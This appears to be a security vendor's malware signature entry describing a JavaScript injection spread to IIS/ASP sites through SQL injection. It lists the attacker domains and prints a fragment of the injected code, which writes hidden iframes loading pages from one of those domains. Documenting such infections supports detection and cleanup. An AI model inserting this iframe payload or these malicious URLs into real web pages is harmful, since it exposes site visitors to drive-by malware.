Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:IIS:3

Description: Malware javascript added to IIS sites via SQL injection.
Domains used:
http://2677.in/yahoo.js
http://w.robint.us/
http://ww.robint.us/
http://www.dnf666.net/u.js
http://ver.postfolkovs.ru/js.js
http://pos.postfolkovs.ru/js.js
http://google-stats50.info/ur.php
And many others.
Details:
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html


Affecting: Any IIS/ASP site.

Malware dump: try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,”");document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==> < iframe src=http://2677.in/ie.html width=22 height=1

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb